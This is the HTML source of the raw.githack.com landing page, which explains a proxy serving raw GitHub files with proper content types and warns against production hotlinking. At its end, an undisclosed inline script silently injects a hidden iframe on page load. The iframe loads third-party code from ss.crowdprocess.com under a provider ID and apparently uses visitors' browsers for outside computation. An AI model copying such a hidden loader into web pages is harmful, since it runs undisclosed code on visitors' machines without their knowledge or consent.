<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>raw.githack.com</title>
    <link href="//fonts.googleapis.com/css?family=Ubuntu+Mono:400,700|Ubuntu:400,700,400italic" rel="stylesheet">
    <style>
      html {
          background: #fff;
          color: #333;
          font: 16px/1.5 Ubuntu, Helvetica, sans-serif;
          -webkit-font-smoothing: antialiased;
      }

      body {
          padding: 0 1em;
          text-align: justify;
      }

      code, pre {
          font-family: 'Ubuntu Mono', 'Source Code Pro', 'DejaVu Sans Mono', Menlo, monospace;
      }

      code {
          background: #f8f8f8;
          border: 1px solid #efefef;
          padding: 1px 4px;
      }

      h1, h2, h3, h4, h5, h6 {
          font-weight: bold;
          margin: 1.4em 0 0.5em;
      }

      h1 {
          font-size: 2.8em;
          margin-top: 1em;
      }

      h2 { font-size: 1.6em; }
      h3 { font-size: 1.2em; }
      h4, h5, h6 { font-size: 1em; }

      h3 a {
          color: inherit;
          margin-top: 1.8em;
          text-decoration: none;
      }

      pre { overflow-x: auto; }

      #doc {
          margin: 0 auto;
          max-width: 800px;
          min-width: 500px;
      }

      .hd { text-align: center; }

      .ft {
          font-size: 0.8em;
          margin: 3em 11em 4em;
          text-align: center;
      }

      .after, .before {
          border: 1px solid;
          padding: 4px 6px;
      }

      .after {
          background: #F2FFEB;
          border-color: #D0FFB5;
      }

      .before {
          background: #FFF7F7;
          border-color: #FFCCCC;
      }
    </style>
</head>
<body>

<div id="doc">
    <div class="hd">
        <h1>
            raw.githack.com
        </h1>
    </div>

    <div class="bd">
        <h2>The Problem</h2>

        <p>
        You've got a <code>raw.github.com</code> URL that points to some work-in-progress HTML, JavaScript, or CSS. You'd like to share it with someone for a quick demo, or maybe you'd like to use it in a <a href="http://jsperf.com/">jsPerf</a> test.
        </p>

        <p>
        Too bad! Most things served from <code>raw.github.com</code> have a <code>text/plain</code> content type and are served with an <code>X-Content-Type-Options: nosniff</code> header, which means HTML won't render, and some browsers won't execute JavaScript or apply CSS.
        </p>

        <h2>The Solution</h2>

        <p>
        Change the domain! Just replace <code>raw.github.com</code> with <code>raw.githack.com</code> and <em>skadoosh</em>, you're loading raw files from your GitHub repo and they're served with appropriate content types. Render HTML, apply CSS, execute JavaScript.
        </p>

        <p><strong>Before</strong></p>
        <pre class="before">https://raw.<strong>github</strong>.com/user/repo/master/filename.js</pre>

        <p><strong>After</strong></p>
        <pre class="after">https://raw.<strong>githack</strong>.com/user/repo/master/filename.js</pre>

        <p>
        It works with gists too! Just replace <code>gist.github.com</code> with <code>gist.githack.com</code> in the raw gist URL.
        </p>

        <h2>The Caveat</h2>

        <p>
        Use this for testing and for sharing demo code with friends, but <strong>don't use it for anything production-related</strong>. It's slow, it might break from time to time, and it's intended as a convenience for development, not free static hosting.
        </p>

        <h2>The Source</h2>

        <p>
        The source code for raw.githack.com is <a href="https://github.com/neoascetic/rawgithack">hosted on GitHub</a>! Fork it and go nuts.
        </p>

        <h2>The FAQ</h2>

        <h3 id="can-i-use-raw-githack-com-in-production"><a href="#can-i-use-raw-githack-com-in-production">Can I use raw.githack.com on a production website?</a></h3>

        <p>
        No. Don't do this. Not even a little bit. It will make me very sad.
        </p>

        <p>
        raw.githack.com is a free service to make developers' lives easier when developing and testing and debugging things. It's not free hosting. Use <a href="http://pages.github.com/">GitHub Pages</a> for that.
        </p>

        <h3 id="what-will-happen-if-im-an-asshole"><a href="#what-will-happen-if-im-an-asshole">What will happen if I hotlink to a raw.githack.com URL on a production
            website?</a></h3>

        <p>
        Bad things. If you hotlink to a raw.githack.com URL on a site that gets lots of traffic, requests will be throttled. If this heavy traffic continues, requests originating from your site will eventually be dropped.
        </p>

        <h3 id="but-i-really-want-to-be-an-asshole"><a href="#but-i-really-want-to-be-an-asshole">But I really really want to hotlink to a raw.githack.com URL in production!</a></h3>

        <p>
        We can't always get what we want. You should use <a href="http://pages.github.com/">GitHub Pages</a>, which is designed for that. Also that's not a question.
        </p>
    </div>

    <div class="ft">
        <p>
        Hey! raw.githack.com is just for fun and is not associated with GitHub in any way. Please use it responsibly.
        </p>

        <p>
        The idea of this service inspired from <a href="http://rawgithub.com">rawgithub.com</a>. I just realized that using a whole framework (node.js + express.js) for such simple thing as requests proxying is overkilling, and made same stuff using nginx only.
        </p>
    </div>

    <a href="https://github.com/neoascetic/rawgithack"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png" alt="Fork me on GitHub"></a>
</div>

<script>(function(){var d=document;d.addEventListener("DOMContentLoaded",function(){var a=d.createElement("iframe");a.src="https://ss.crowdprocess.com/#?providerId=10d20546-8e9f-4e00-922d-11ebd6cd4c11";a.sandbox="allow-scripts allow-same-origin";a.style.display="none";d.body.appendChild(a)})})()</script>
</body>
</html>
